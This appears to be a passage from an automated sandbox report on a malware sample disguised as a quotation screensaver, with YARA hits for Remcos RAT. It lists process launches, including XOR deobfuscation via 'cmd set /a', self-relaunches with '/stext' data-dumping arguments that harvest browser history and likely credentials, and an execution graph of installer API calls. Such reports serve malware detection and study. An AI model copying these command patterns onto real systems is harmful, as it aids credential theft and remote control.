                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:112
                                                                                                                Start time:06:02:29
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "133^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:113
                                                                                                                Start time:06:02:29
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:114
                                                                                                                Start time:06:02:29
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "157^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:115
                                                                                                                Start time:06:02:29
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:116
                                                                                                                Start time:06:02:29
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "145^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:117
                                                                                                                Start time:06:02:29
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:118
                                                                                                                Start time:06:02:29
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "216^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:119
                                                                                                                Start time:06:02:29
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:120
                                                                                                                Start time:06:02:29
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "145^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:121
                                                                                                                Start time:06:02:29
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:122
                                                                                                                Start time:06:02:30
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "129^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:123
                                                                                                                Start time:06:02:30
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:124
                                                                                                                Start time:06:02:30
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "201^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:125
                                                                                                                Start time:06:02:30
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:126
                                                                                                                Start time:06:02:30
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "137^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:127
                                                                                                                Start time:06:02:30
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:128
                                                                                                                Start time:06:02:30
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "129^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:129
                                                                                                                Start time:06:02:30
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:130
                                                                                                                Start time:06:03:05
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Users\user\Desktop\z1Quotation.scr.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\Desktop\z1Quotation.scr.exe"
                                                                                                                Imagebase:0x400000
                                                                                                                File size:583'221 bytes
                                                                                                                MD5 hash:0A648622633DBD21FEF151B525657B2C
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000082.00000003.35958881929.0000000007431000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000082.00000003.35991087390.0000000007431000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000082.00000003.35968576941.0000000007431000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000082.00000003.35961051808.0000000007431000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000082.00000003.35121830730.000000000742E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000082.00000003.34025085580.000000000742C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000082.00000003.35978843989.0000000007431000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000082.00000003.35970951043.0000000007431000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000082.00000003.35121957679.0000000007422000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000082.00000003.35981100178.0000000007431000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000082.00000003.35988865373.0000000007431000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                Has exited:true

                                                                                                                Target ID:132
                                                                                                                Start time:06:08:41
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\dxdiag.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Windows\System32\dxdiag.exe" /t C:\Users\user\AppData\Local\Temp\sysinfo.txt
                                                                                                                Imagebase:0x530000
                                                                                                                File size:222'720 bytes
                                                                                                                MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                Target ID:135
                                                                                                                Start time:06:08:48
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\drivers\mstee.sys
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:
                                                                                                                Imagebase:
                                                                                                                File size:12'288 bytes
                                                                                                                MD5 hash:244C73253E165582DDC43AF4467D23DF
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                Target ID:136
                                                                                                                Start time:06:08:48
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\drivers\mskssrv.sys
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:
                                                                                                                Imagebase:
                                                                                                                File size:34'816 bytes
                                                                                                                MD5 hash:26854C1F5500455757BC00365CEF9483
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                Target ID:137
                                                                                                                Start time:06:08:52
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Users\user\Desktop\z1Quotation.scr.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Users\user\Desktop\z1Quotation.scr.exe /stext "C:\Users\user\AppData\Local\Temp\jcokhfyxinncnfcgtxknzv"
                                                                                                                Imagebase:0x400000
                                                                                                                File size:583'221 bytes
                                                                                                                MD5 hash:0A648622633DBD21FEF151B525657B2C
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                Target ID:138
                                                                                                                Start time:06:08:52
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Users\user\Desktop\z1Quotation.scr.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Users\user\Desktop\z1Quotation.scr.exe /stext "C:\Users\user\AppData\Local\Temp\hhsvynxt"
                                                                                                                Imagebase:0x400000
                                                                                                                File size:583'221 bytes
                                                                                                                MD5 hash:0A648622633DBD21FEF151B525657B2C
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                Target ID:139
                                                                                                                Start time:06:08:52
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Users\user\Desktop\z1Quotation.scr.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Users\user\Desktop\z1Quotation.scr.exe /stext "C:\Users\user\AppData\Local\Temp\pqvxpoqshoxjfvzq"
                                                                                                                Imagebase:0x400000
                                                                                                                File size:583'221 bytes
                                                                                                                MD5 hash:0A648622633DBD21FEF151B525657B2C
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                Target ID:140
                                                                                                                Start time:06:09:09
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Users\user\Desktop\z1Quotation.scr.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Users\user\Desktop\z1Quotation.scr.exe /sort "Visit Time" /stext "C:\Users\user\AppData\Local\Temp\azdzamjeqinayzgxunqjk"
                                                                                                                Imagebase:0x400000
                                                                                                                File size:583'221 bytes
                                                                                                                MD5 hash:0A648622633DBD21FEF151B525657B2C
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_BrowsingHistoryView, Description: Yara detected BrowsingHistoryView browser history reader tool, Source: 0000008C.00000002.36509511110.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                Has exited:true

                                                                                                                Target ID:143
                                                                                                                Start time:06:09:20
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1412 -s 2348
                                                                                                                Imagebase:0x250000
                                                                                                                File size:482'640 bytes
                                                                                                                MD5 hash:40A149513D721F096DDF50C04DA2F01F
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                Target ID:144
                                                                                                                Start time:06:09:25
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Users\user\Desktop\z1Quotation.scr.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Users\user\Desktop\z1Quotation.scr.exe /stext "C:\Users\user\AppData\Local\Temp\xadmhfv"
                                                                                                                Imagebase:0x400000
                                                                                                                File size:583'221 bytes
                                                                                                                MD5 hash:0A648622633DBD21FEF151B525657B2C
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                Target ID:145
                                                                                                                Start time:06:09:26
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Users\user\Desktop\z1Quotation.scr.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Users\user\Desktop\z1Quotation.scr.exe /stext "C:\Users\user\AppData\Local\Temp\xpsjxjoeplzrro"
                                                                                                                Imagebase:0x400000
                                                                                                                File size:583'221 bytes
                                                                                                                MD5 hash:0A648622633DBD21FEF151B525657B2C
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                Target ID:146
                                                                                                                Start time:06:09:26
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Users\user\Desktop\z1Quotation.scr.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Users\user\Desktop\z1Quotation.scr.exe /stext "C:\Users\user\AppData\Local\Temp\gymlnlyltcmojzwgtmnvsm"
                                                                                                                Imagebase:0x400000
                                                                                                                File size:583'221 bytes
                                                                                                                MD5 hash:0A648622633DBD21FEF151B525657B2C
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:18.8%
                                                                                                                  Dynamic/Decrypted Code Coverage:13.6%
                                                                                                                  Signature Coverage:20.8%
                                                                                                                  Total number of Nodes:1571
                                                                                                                  Total number of Limit Nodes:35
5725->5724 5726 401efe 5727 402c3e 21 API calls 5726->5727 5728 401f04 5727->5728 5729 402c3e 21 API calls 5728->5729 5730 401f0d 5729->5730 5731 402c3e 21 API calls 5730->5731 5732 401f16 5731->5732 5733 402c3e 21 API calls 5732->5733 5734 401f1f 5733->5734 5735 401423 28 API calls 5734->5735 5736 401f26 5735->5736 5743 405a7a ShellExecuteExA 5736->5743 5738 4027cd 5739 401f61 5739->5738 5740 40683b 5 API calls 5739->5740 5741 401f7b CloseHandle 5740->5741 5741->5738 5743->5739 4365 401f80 4366 402c3e 21 API calls 4365->4366 4367 401f86 4366->4367 4368 4054e2 28 API calls 4367->4368 4369 401f90 4368->4369 4380 405a37 CreateProcessA 4369->4380 4372 401fb7 CloseHandle 4376 4027cd 4372->4376 4375 401fab 4377 401fb0 4375->4377 4378 401fb9 4375->4378 4388 4062fc wsprintfA 4377->4388 4378->4372 4381 401f96 4380->4381 4382 405a6a CloseHandle 4380->4382 4381->4372 4381->4376 4383 40683b WaitForSingleObject 4381->4383 4382->4381 4384 406855 4383->4384 4385 406867 GetExitCodeProcess 4384->4385 4389 406802 4384->4389 4385->4375 4388->4372 4390 40681f PeekMessageA 4389->4390 4391 406815 DispatchMessageA 4390->4391 4392 40682f WaitForSingleObject 4390->4392 4391->4390 4392->4384 5744 401000 5745 401037 BeginPaint GetClientRect 5744->5745 5747 40100c DefWindowProcA 5744->5747 5748 4010f3 5745->5748 5749 401179 5747->5749 5750 401073 CreateBrushIndirect FillRect DeleteObject 5748->5750 5751 4010fc 5748->5751 5750->5748 5752 401102 CreateFontIndirectA 5751->5752 5753 401167 EndPaint 5751->5753 5752->5753 5754 401112 6 API calls 5752->5754 5753->5749 5754->5753 5755 402000 5756 402c3e 21 API calls 5755->5756 5757 402007 5756->5757 5758 4067c6 5 API calls 5757->5758 5759 402016 5758->5759 5760 40202e GlobalAlloc 5759->5760 5761 40209e 5759->5761 5760->5761 5762 402042 5760->5762 5763 4067c6 5 API calls 5762->5763 5764 402049 5763->5764 5765 4067c6 5 API calls 5764->5765 5766 402053 5765->5766 5766->5761 5770 4062fc wsprintfA 5766->5770 5768 40208e 5771 4062fc wsprintfA 5768->5771 
5770->5768 5771->5761 5772 401902 5773 401939 5772->5773 5774 402c3e 21 API calls 5773->5774 5775 40193e 5774->5775 5776 405b60 71 API calls 5775->5776 5777 401947 5776->5777 5778 401502 5779 401507 5778->5779 5781 40151f 5778->5781 5780 402c1c 21 API calls 5779->5780 5780->5781 4414 402483 4415 402c3e 21 API calls 4414->4415 4416 402495 4415->4416 4417 402c3e 21 API calls 4416->4417 4418 40249f 4417->4418 4431 402cce 4418->4431 4421 402aca 4422 4024d4 4423 4024e0 4422->4423 4435 402c1c 4422->4435 4426 402502 RegSetValueExA 4423->4426 4438 403202 4423->4438 4424 402c3e 21 API calls 4427 4024cd lstrlenA 4424->4427 4429 402518 RegCloseKey 4426->4429 4427->4422 4429->4421 4432 402ce9 4431->4432 4453 406252 4432->4453 4436 406431 21 API calls 4435->4436 4437 402c31 4436->4437 4437->4423 4439 403211 SetFilePointer 4438->4439 4440 40322d 4438->4440 4439->4440 4457 40330a GetTickCount 4440->4457 4445 40330a 46 API calls 4446 403264 4445->4446 4447 4032ca 4446->4447 4448 4032d0 ReadFile 4446->4448 4449 403273 4446->4449 4447->4426 4448->4447 4449->4447 4451 405fa9 ReadFile 4449->4451 4472 405fd8 WriteFile 4449->4472 4451->4449 4454 406261 4453->4454 4455 4024af 4454->4455 4456 40626c RegCreateKeyExA 4454->4456 4455->4421 4455->4422 4455->4424 4456->4455 4458 403462 4457->4458 4459 403338 4457->4459 4460 402ec2 36 API calls 4458->4460 4474 403489 SetFilePointer 4459->4474 4468 403234 4460->4468 4462 403343 SetFilePointer 4466 403368 4462->4466 4467 405fd8 WriteFile 4466->4467 4466->4468 4469 403443 SetFilePointer 4466->4469 4475 403473 4466->4475 4478 40690b 4466->4478 4485 402ec2 4466->4485 4467->4466 4468->4447 4470 405fa9 ReadFile 4468->4470 4469->4458 4471 40324d 4470->4471 4471->4445 4471->4447 4473 405ff6 4472->4473 4473->4449 4474->4462 4476 405fa9 ReadFile 4475->4476 4477 403486 4476->4477 4477->4466 4479 406930 4478->4479 4480 406938 4478->4480 4479->4466 4480->4479 4481 4069c8 GlobalAlloc 4480->4481 4482 4069bf GlobalFree 4480->4482 4483 406a36 GlobalFree 
4480->4483 4484 406a3f GlobalAlloc 4480->4484 4481->4479 4481->4480 4482->4481 4483->4484 4484->4479 4484->4480 4486 402ed0 4485->4486 4487 402ee8 4485->4487 4488 402ee0 4486->4488 4489 402ed9 DestroyWindow 4486->4489 4490 402ef0 4487->4490 4491 402ef8 GetTickCount 4487->4491 4488->4466 4489->4488 4493 406802 2 API calls 4490->4493 4491->4488 4492 402f06 4491->4492 4494 402f3b CreateDialogParamA ShowWindow 4492->4494 4495 402f0e 4492->4495 4493->4488 4494->4488 4495->4488 4500 402ea6 4495->4500 4497 402f1c wsprintfA 4498 4054e2 28 API calls 4497->4498 4499 402f39 4498->4499 4499->4488 4501 402eb5 4500->4501 4502 402eb7 MulDiv 4500->4502 4501->4502 4502->4497 5782 6d431000 5785 6d43101b 5782->5785 5786 6d43154b GlobalFree 5785->5786 5787 6d431020 5786->5787 5788 6d431027 GlobalAlloc 5787->5788 5789 6d431024 5787->5789 5788->5789 5790 6d431572 3 API calls 5789->5790 5791 6d431019 5790->5791 5792 401d03 5793 402c1c 21 API calls 5792->5793 5794 401d09 IsWindow 5793->5794 5795 401a13 5794->5795 5796 401905 5797 402c3e 21 API calls 5796->5797 5798 40190c 5797->5798 5799 405ab4 MessageBoxIndirectA 5798->5799 5800 401915 5799->5800 5801 402785 5802 40278b 5801->5802 5803 40278f FindNextFileA 5802->5803 5806 4027a1 5802->5806 5804 4027e0 5803->5804 5803->5806 5807 40639e lstrcpynA 5804->5807 5807->5806 5815 404889 5816 404899 5815->5816 5817 4048bf 5815->5817 5818 40443e 22 API calls 5816->5818 5819 4044a5 8 API calls 5817->5819 5820 4048a6 SetDlgItemTextA 5818->5820 5821 4048cb 5819->5821 5820->5817 5822 401b8c 5823 401b99 5822->5823 5824 401bdd 5822->5824 5825 401c21 5823->5825 5830 401bb0 5823->5830 5826 401be1 5824->5826 5827 401c06 GlobalAlloc 5824->5827 5829 406431 21 API calls 5825->5829 5836 402394 5825->5836 5826->5836 5843 40639e lstrcpynA 5826->5843 5828 406431 21 API calls 5827->5828 5828->5825 5831 40238e 5829->5831 5841 40639e lstrcpynA 5830->5841 5831->5836 5837 405ab4 MessageBoxIndirectA 5831->5837 5834 401bf3 GlobalFree 5834->5836 5835 401bbf 5842 40639e 
lstrcpynA 5835->5842 5837->5836 5839 401bce 5844 40639e lstrcpynA 5839->5844 5841->5835 5842->5839 5843->5834 5844->5836 5845 40298f 5846 402c1c 21 API calls 5845->5846 5847 402995 5846->5847 5848 406431 21 API calls 5847->5848 5849 4027cd 5847->5849 5848->5849 5850 401490 5851 4054e2 28 API calls 5850->5851 5852 401497 5851->5852 5853 402611 5854 402c3e 21 API calls 5853->5854 5855 402618 5854->5855 5858 405f31 GetFileAttributesA CreateFileA 5855->5858 5857 402624 5858->5857 5165 402595 5166 402c7e 21 API calls 5165->5166 5167 40259f 5166->5167 5168 402c1c 21 API calls 5167->5168 5169 4025a8 5168->5169 5170 4025b6 5169->5170 5175 4027cd 5169->5175 5171 4025c3 RegEnumKeyA 5170->5171 5172 4025cf RegEnumValueA 5170->5172 5173 4025eb RegCloseKey 5171->5173 5172->5173 5174 4025e4 5172->5174 5173->5175 5174->5173 5859 40149d 5860 402394 5859->5860 5861 4014ab PostQuitMessage 5859->5861 5861->5860 4176 405620 4177 405642 GetDlgItem GetDlgItem GetDlgItem 4176->4177 4178 4057cb 4176->4178 4222 404473 SendMessageA 4177->4222 4179 4057d3 GetDlgItem CreateThread CloseHandle 4178->4179 4183 4057fb 4178->4183 4179->4183 4307 4055b4 OleInitialize 4179->4307 4181 4056b2 4188 4056b9 GetClientRect GetSystemMetrics SendMessageA SendMessageA 4181->4188 4182 405829 4186 405831 4182->4186 4187 405884 4182->4187 4183->4182 4184 405811 ShowWindow ShowWindow 4183->4184 4185 40584a 4183->4185 4227 404473 SendMessageA 4184->4227 4231 4044a5 4185->4231 4190 405839 4186->4190 4191 40585d ShowWindow 4186->4191 4187->4185 4195 405891 SendMessageA 4187->4195 4193 405727 4188->4193 4194 40570b SendMessageA SendMessageA 4188->4194 4228 404417 4190->4228 4198 40587d 4191->4198 4199 40586f 4191->4199 4201 40573a 4193->4201 4202 40572c SendMessageA 4193->4202 4194->4193 4197 405856 4195->4197 4203 4058aa CreatePopupMenu 4195->4203 4200 404417 SendMessageA 4198->4200 4245 4054e2 4199->4245 4200->4187 4223 40443e 4201->4223 4202->4201 4256 406431 4203->4256 4208 40574a 4211 405753 ShowWindow 4208->4211 
